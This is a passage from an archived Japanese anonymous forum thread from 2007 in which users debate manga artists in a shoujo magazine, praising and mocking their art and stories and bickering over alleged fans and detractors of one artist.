青木はお涙頂戴場面ばっかで秋田(´Д‘)
水波の連載もエロ抜けば読ませるほうだとオモ

144 :花と名無しさん:2007/11/28(水) 06:16:56 ID:???P
青木・水波・くまがいは必要だね。

145 :花と名無しさん:2007/11/28(水) 07:17:52 ID:???O
別にくまがいは居なくても…

146 :花と名無しさん:2007/11/28(水) 23:43:24 ID:???O
水波はエロなしならね。今までみたくエロならいらない。
エロ描きたいならTL雑誌へ本気で行って欲しい。

147 :花と名無しさん:2007/11/29(木) 00:11:06 ID:???0
>>144
くまがいじゃなくて池山田でしょ。
なんだかんだ三人は看板だよ。人気的にもコミクスの売り上げ的にも。

148 :花と名無しさん:2007/11/29(木) 21:54:53 ID:???0
>>146
エロなしの水波って想像できない。

>>147
「3人は看板」ってほど同列な存在か?
「東の長島、西の難波」って感じ。

しがのはもうじきちゅちゅ行きだろうけど、
そしたら誰が長期連載になるんだろう。
悠妃かな。
千葉を応援したいけど、>>120のいうとおり
最近の連載が微妙だった…

149 :花と名無しさん:2007/11/29(木) 22:28:20 ID:???O
密樹さんがくるような気がするな


150 :花と名無しさん:2007/11/30(金) 00:28:35 ID:???O
うん。みつきさんは話で読ませるタイプだし長期連載候補だと思う。
コミクスも買ったら以外と面白かったしw

千葉さんは本当におしかったな‥‥。読み切りのが面白いって微妙じゃん。

水波さんは、ファンタジーとかミステリー(エロなし)を描ければ今までのイメージが払拭出来そう‥‥。
エロじゃなくて、読ませる漫画で勝負。

ただ、眉炭みたく別マ(エロなし雑誌)に行って、エロなし作品に挑戦したけど
全然ダメ(人気取れない)とかになる可能性もあるけど。
水波さんもエロ以外で頑張って欲しい。

151 :花と名無しさん:2007/11/30(金) 01:40:15 ID:???0
あらら眉タン移籍失敗したんだ?

152 :花と名無しさん:2007/11/30(金) 03:39:15 ID:???0
みつきさんは短期連載要員な気がする。
話どうこう以前に絵が古臭すぎる。タッチもなんだか古臭い。

153 :花と名無しさん:2007/11/30(金) 23:06:42 ID:???O
やっぱ、みつきさんは長期連載向き漫画家だよ。
水瀬さんみたく絵だけ可愛いとかなら、別に漫画描く必要ないよ。
イラストレーターでもやればって感じ。
あくまで漫画なら話で惹き付けられないと。
みつきさんは話で惹き付けられる。
絵は今風に直せても、話作りはやっぱ才能だよ。

154 :花と名無しさん:2007/11/30(金) 23:30:11 ID:???0
>>153
私はその話しの部分でみつきさんが嫌いなんだが…
常識なくてキモい。
変なマンセー知り合い乙

155 :花と名無しさん:2007/11/30(金) 23:32:17 ID:???0
なんかこの間からみつきマンセーがいるけど(本人か?)
何でみつきが読ませる話を描いていると思ってるのか謎w
絵も話も標準以下じゃん

156 :花と名無しさん:2007/12/01(土) 08:55:54 ID:???O
みつきマンセー気持ち悪い

157 :花と名無しさん:2007/12/01(土) 16:38:10 ID:???O
ここんとこ、みつきマンセーが湧いてるな。
どうせ本人だろうけど。
必死ですねw
絵もだんだんキモくなってるし、話も好きじゃない。
短期だろうと長期だろうと連載向きじゃないと思うけど。

158 :花と名無しさん:2007/12/01(土) 16:39:14 ID:???0
こりはひどい

159 :花と名無しさん:2007/12/01(土) 23:59:00 ID:???0
どうでもいいけど、みつきのモブアシやばくないか?
背後霊みたいな表情でデッサン崩壊なモブは初めて見たよ

咲坂のモブは新島さんだよね。あれはあれでいいと思う。
モブであんまりおかしいの書かれると気になってしまうんだがw

160 :花と名無しさん:2007/12/02(日) 05:09:16 ID:???O

みつきさんはデビュー当時から話は好きだった。
(告白禁止令!あたりで読者ウケ狙った時は話も嫌いだったけど)
初連載の時は絵の向上もみられて
期待できる作家に化けるかもと思ったけど
2回目連載あたりから絵の劣化が酷すぎるよね。
古臭さに磨きがかかりすぎてる。

この人年齢は若いよね?
みつきさんはホントに
絵をクリアにしないと
残るの難しいかもね。


161 :花と名無しさん:2007/12/02(日) 07:36:06 ID:???O
みつきまだ若いんだ?
何歳なの?
ひがんだりする辺り、てっきりオバサンかと…

162 :花と名無しさん:2007/12/02(日) 08:44:55 ID:???0
tp://www.oscd.jp/topics/topics_manga.php?gakka_id=4&topic_id=562

ちょw増刊作家の月原りょくって人本名杉山晃子だってw
これ本人も本名掲載OKだしてるってことだよね?恥ずかしくないのかね

163 :花と名無しさん:2007/12/02(日) 09:58:25 ID:???0
すぎ恵美子の本名と同じ苗字だけど、関係あったりして>杉山晃子

164 :花と名無しさん:2007/12/02(日) 10:58:09 ID:???0
最近の新人は専門学校からのデビュー者ばっかだね。
毎月デビュー企画でデビューした4分の3は専門からじゃまいか?

165 :花と名無しさん:2007/12/02(日) 12:30:58 ID:???0
ほかの雑誌はどうなの? 専門学校の比率。
けっこうな割合になってる気がする。

166 :花と名無しさん:2007/12/02(日) 13:31:41 ID:???O
>>160同意。みつきさん話はかなり好きだ。絵は変わってほしいな‥。
浅見雅みたく変えてほしい。浅見雅は一時期、男女とも目とから辺をガラッと変えたよね。
ただ全身の書き方は変わってないけどw
みつきさんおしいよね‥‥話は作れるんだから後は可愛い今時の絵だ。

167 :花と名無しさん:2007/12/02(日) 16:34:37 ID:???O

あゆみの絵でみつきの話だったらバランスいいのにな。。。
とか思ってしまったw

168 :花と名無しさん:2007/12/02(日) 22:47:28 ID:???O
あゆみ凛☆2冊目のコミクス『ほしいのはあなただけ』11月26日発売!!


蜜樹みこ☆2冊目のコミクス『恋色旋律☆ダブル王子』11月26日発売!!


くまがい杏子☆『放課後オレンジ@』11月26日発売!!


藍川さき☆2冊目のコミクス『シークレット・キス』11月26日発売!! 


169 :花と名無しさん:2007/12/03(月) 00:32:56 ID:???0
みんなそんなにみつきの話がいいと思うのか…
好みはそれぞれだからいいけど
私は心理的に納得出来ないし
感じ悪くて好きじゃないなあ。

170 :花と名無しさん:2007/12/03(月) 00:39:53 ID:???0
わたしもみつきの話大嫌い・・・
生理的にうけつけない

171 :花と名無しさん:2007/12/03(月) 01:28:24 ID:???O
そういう事書くヤシって、蜜樹さんが売れる前のアンチでしょ?
蜜樹さんが売れたからっていつまでもひがむなよ。わざわざ蜜樹スレから出てこなきゃいいのに。

悪いが、今の所蜜樹さんは凄い順調に売れてるんで。
コミクスも売り上げや反応も良かったし。

すぐに本人乙とか書くのもバレバレだから。

新しいファンが着々と増えていくのは事実なんだし、いつまでもみっともないと思うよ。

172 :花と名無しさん:2007/12/03(月) 02:03:09 ID:???0
決め付け厨乙

自分の好きな作家を嫌いだと言う人もいる。
当たり前の事じゃね?
皆思ったことを書いただけなのになに1人で火病ってんの?

173 :花と名無しさん:2007/12/03(月) 06:39:26 ID:???0
みつき売れてるの?
アンチとか言われても、別に執着してるわけでもないし…
売れているのをひがむって言われても
こっちは作家じゃないし、なにをひがむのかわかんない。
好きじゃないって言っただけで何過剰反応してるのかな…
なんか…みつきマンセーが気持ち悪い。

174 :花と名無しさん:2007/12/03(月) 14:11:25 ID:???O
分かるな〜。個人的には伊吹楓が超大っ嫌いだもん。あの絵がマジダメ‥‥。話も毎回気分悪くなるし。

少コミには合わないし無理!何より気持ち悪い!!あのデブキャラきついよ。
なんであんなに太ってるのか‥‥男も女もキモい。
話も男性誌向きだよ。

蜜樹アンチも大概しつこいね。毎回2人しかいないし。ただスレ荒らしたいだけにしか見えないけど。
ま、そういう私も伊吹アンチだwww

175 :花と名無しさん:2007/12/03(月) 19:05:46 ID:???0
みつきアンチしつこいねじゃなくて
みつきアンチに過剰反応するおまえがしつこいんだよ、
分かる??


みつきの漫画、
少コミには合わないし無理!何より気持ち悪い!!あのデカ目キャラきついよ。
なんであんなに目がデカイのか‥‥男も女もキモい。
話も子供騙しだよ。

みつきマンセーも大概しつこいね。毎回一人しかいないし。ただスレ荒らしたいだけにしか見えないけど。
ま、そういう私もみつきマンセーの携帯厨アンチだwww

176 :花と名無しさん:2007/12/04(火) 00:37:08 ID:???O
ぷっ‥171と174は別人だし。頭大丈夫?
175お前が一番しつこいしアフォなんじゃない?かまわなきゃいいのに。

177 :花と名無しさん:2007/12/04(火) 01:09:59 ID:YLHlV2vX0
とりあえず、みつきが糞って事でFA。

178 :花と名無しさん:2007/12/04(火) 02:50:06 ID:???0
>>176
貴方2ちゃんに向いてないよ

40 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)